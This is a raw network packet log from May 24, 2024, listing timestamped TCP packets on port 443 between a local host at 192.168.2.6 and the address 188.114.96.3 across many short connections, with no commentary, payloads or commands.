May 24, 2024 00:22:16.320506096 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.366496086 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.366780043 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.366822958 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.366836071 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.407859087 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.408042908 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.408077955 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.408102989 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.408129930 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.408144951 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.429270029 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.707700968 CEST	443	49742	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.707787037 CEST	49742	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.709323883 CEST	49742	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.709352016 CEST	443	49742	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.709613085 CEST	443	49742	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.710675001 CEST	49742	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.710807085 CEST	49742	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.710844994 CEST	443	49742	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.800470114 CEST	443	49740	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.800590992 CEST	443	49740	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.800642014 CEST	49740	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.801995039 CEST	49740	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.802025080 CEST	443	49740	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.198589087 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.198636055 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.198699951 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.199189901 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.199203968 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.492244959 CEST	443	49742	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.492301941 CEST	443	49742	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.492497921 CEST	49742	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.492531061 CEST	49742	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.492548943 CEST	443	49742	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.526793003 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.526845932 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.526927948 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.527410030 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.527436972 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.730381966 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.730462074 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.732273102 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.732289076 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.732609034 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.734157085 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.735222101 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.735249043 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.735342979 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.735379934 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.735519886 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.735543013 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.735917091 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.735940933 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.736073017 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.736099005 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.736329079 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.736356020 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.736366034 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.736377954 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.736515999 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.736538887 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.736557961 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.736681938 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.736710072 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.752077103 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.752271891 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.752315998 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.752341986 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.752371073 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.752386093 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.752440929 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:17.752456903 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:17.759403944 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:18.047772884 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:18.047838926 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:18.051213026 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:18.051234007 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:18.051493883 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:18.052839994 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:18.052839994 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:18.052885056 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:18.053270102 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:18.053282022 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.314697027 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.314798117 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.314863920 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.315432072 CEST	49743	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.315450907 CEST	443	49743	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.474140882 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.474226952 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.474284887 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.474478006 CEST	49744	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.474499941 CEST	443	49744	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.520021915 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.520088911 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.520265102 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.520265102 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.530253887 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.530292988 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.530339003 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.530627012 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.530648947 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:20.825511932 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:20.825588942 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:21.614514112 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:21.614552021 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:21.614645958 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:21.615907907 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:21.615928888 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:21.687695980 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:21.688169956 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:21.711213112 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:21.711231947 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:21.711450100 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:21.712769985 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:21.712769985 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:21.712798119 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:21.713342905 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:21.713350058 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.167874098 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.167952061 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.169481993 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.169495106 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.169838905 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.215977907 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.216644049 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.216644049 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.216792107 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.465614080 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.465703964 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.465881109 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.466521978 CEST	49745	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.466543913 CEST	443	49745	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.517896891 CEST	49747	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.517925978 CEST	443	49747	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.518099070 CEST	49747	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.518637896 CEST	49747	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.518651009 CEST	443	49747	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.846306086 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.846374989 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.847012043 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.847557068 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.847579002 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.847590923 CEST	49746	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.847596884 CEST	443	49746	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.849193096 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.849205017 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:22.849411011 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.849766016 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:22.849780083 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.012721062 CEST	443	49747	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.012897015 CEST	49747	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.014245987 CEST	49747	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.014256954 CEST	443	49747	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.014498949 CEST	443	49747	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.015877962 CEST	49747	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.015928984 CEST	49747	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.015976906 CEST	443	49747	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.325542927 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.325645924 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.326960087 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.326970100 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.327217102 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.328515053 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.328648090 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.328672886 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.719505072 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.719546080 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.719597101 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.719618082 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.719643116 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.719681978 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.720007896 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.720717907 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.720777988 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.720783949 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.720793962 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.721373081 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.721376896 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.721385002 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.721427917 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.722068071 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.722923040 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.722978115 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.722985983 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.723001957 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.723057032 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.723057985 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.723094940 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.723242998 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.723242998 CEST	49748	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.723264933 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.723272085 CEST	443	49748	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.758686066 CEST	443	49747	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.758701086 CEST	49750	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.758732080 CEST	443	49750	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.758769989 CEST	443	49747	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.758882999 CEST	49747	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.758887053 CEST	49750	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.759020090 CEST	49747	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.759048939 CEST	443	49747	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.759277105 CEST	49750	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.759291887 CEST	443	49750	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.771975040 CEST	49751	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.772042036 CEST	443	49751	188.114.96.3	192.168.2.6
May 24, 2024 00:22:23.772207022 CEST	49751	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.772643089 CEST	49751	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:23.772661924 CEST	443	49751	188.114.96.3	192.168.2.6
May 24, 2024 00:22:24.260452986 CEST	443	49750	188.114.96.3	192.168.2.6
May 24, 2024 00:22:24.260704041 CEST	49750	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:24.261262894 CEST	443	49751	188.114.96.3	192.168.2.6
May 24, 2024 00:22:24.261509895 CEST	49751	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:24.262420893 CEST	49750	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:24.262428999 CEST	443	49750	188.114.96.3	192.168.2.6
May 24, 2024 00:22:24.262515068 CEST	49751	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:24.262520075 CEST	443	49751	188.114.96.3	192.168.2.6
May 24, 2024 00:22:24.262775898 CEST	443	49750	188.114.96.3	192.168.2.6
May 24, 2024 00:22:24.262813091 CEST	443	49751	188.114.96.3	192.168.2.6
May 24, 2024 00:22:24.264098883 CEST	49751	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:24.264098883 CEST	49750	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:24.264193058 CEST	49751	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:24.264198065 CEST	443	49751	188.114.96.3	192.168.2.6
May 24, 2024 00:22:24.264229059 CEST	49750	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:24.264262915 CEST	443	49750	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.384758949 CEST	443	49751	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.384850025 CEST	443	49751	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.385034084 CEST	49751	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:25.385199070 CEST	49751	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:25.385235071 CEST	443	49751	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.402767897 CEST	443	49750	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.403033018 CEST	443	49750	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.403182030 CEST	49750	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:25.403431892 CEST	49750	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:25.403454065 CEST	443	49750	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.431550980 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:25.431638956 CEST	443	49752	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.431749105 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:25.432173014 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:25.432209015 CEST	443	49752	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.957751036 CEST	443	49752	188.114.96.3	192.168.2.6
May 24, 2024 00:22:25.957871914 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:26.978564024 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:26.978593111 CEST	443	49752	188.114.96.3	192.168.2.6
May 24, 2024 00:22:26.978880882 CEST	443	49752	188.114.96.3	192.168.2.6
May 24, 2024 00:22:26.981635094 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:26.981770992 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:26.981802940 CEST	443	49752	188.114.96.3	192.168.2.6
May 24, 2024 00:22:26.981869936 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:26.981882095 CEST	443	49752	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.200074911 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.200118065 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.200177908 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.200612068 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.200623989 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.430926085 CEST	443	49752	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.431186914 CEST	443	49752	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.431302071 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.431302071 CEST	49752	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.489437103 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.489532948 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.489619970 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.489896059 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.489929914 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.692249060 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.692331076 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.693420887 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.693439960 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.693661928 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.694763899 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.695509911 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.695555925 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.695671082 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.695719957 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.695864916 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.695930958 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.696101904 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.696162939 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.696393967 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.696448088 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.696661949 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.696712971 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.696738958 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.696769953 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.696866035 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.696914911 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.696964979 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.697052956 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.697102070 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.734592915 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.735032082 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.735122919 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.735191107 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.735258102 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:27.735337019 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:27.744766951 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.011570930 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.011765003 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.012981892 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.012994051 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.013488054 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.014607906 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.014791012 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.014837980 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.014910936 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.014928102 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.850899935 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.851142883 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.851248980 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.851310015 CEST	49754	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.851325989 CEST	443	49754	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.905864954 CEST	49755	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.905914068 CEST	443	49755	188.114.96.3	192.168.2.6
May 24, 2024 00:22:28.905982971 CEST	49755	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.906409025 CEST	49755	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:28.906425953 CEST	443	49755	188.114.96.3	192.168.2.6
May 24, 2024 00:22:29.475692034 CEST	443	49755	188.114.96.3	192.168.2.6
May 24, 2024 00:22:29.475886106 CEST	49755	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:29.477010012 CEST	49755	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:29.477037907 CEST	443	49755	188.114.96.3	192.168.2.6
May 24, 2024 00:22:29.478077888 CEST	443	49755	188.114.96.3	192.168.2.6
May 24, 2024 00:22:29.479279041 CEST	49755	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:29.479387045 CEST	49755	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:29.479454041 CEST	443	49755	188.114.96.3	192.168.2.6
May 24, 2024 00:22:30.438441038 CEST	443	49755	188.114.96.3	192.168.2.6
May 24, 2024 00:22:30.438693047 CEST	443	49755	188.114.96.3	192.168.2.6
May 24, 2024 00:22:30.438781023 CEST	49755	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:30.439259052 CEST	49755	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:30.450426102 CEST	49756	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:30.450462103 CEST	443	49756	188.114.96.3	192.168.2.6
May 24, 2024 00:22:30.450536966 CEST	49756	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:30.450870037 CEST	49756	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:30.450882912 CEST	443	49756	188.114.96.3	192.168.2.6
May 24, 2024 00:22:30.908796072 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:30.908900976 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:30.909028053 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:30.909147978 CEST	49753	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:30.909192085 CEST	443	49753	188.114.96.3	192.168.2.6
May 24, 2024 00:22:31.105149031 CEST	443	49756	188.114.96.3	192.168.2.6
May 24, 2024 00:22:31.105317116 CEST	49756	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:31.106690884 CEST	49756	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:31.106698990 CEST	443	49756	188.114.96.3	192.168.2.6
May 24, 2024 00:22:31.107469082 CEST	443	49756	188.114.96.3	192.168.2.6
May 24, 2024 00:22:31.108736038 CEST	49756	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:31.108829021 CEST	49756	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:31.108833075 CEST	443	49756	188.114.96.3	192.168.2.6
May 24, 2024 00:22:31.846580982 CEST	443	49756	188.114.96.3	192.168.2.6
May 24, 2024 00:22:31.846801043 CEST	443	49756	188.114.96.3	192.168.2.6
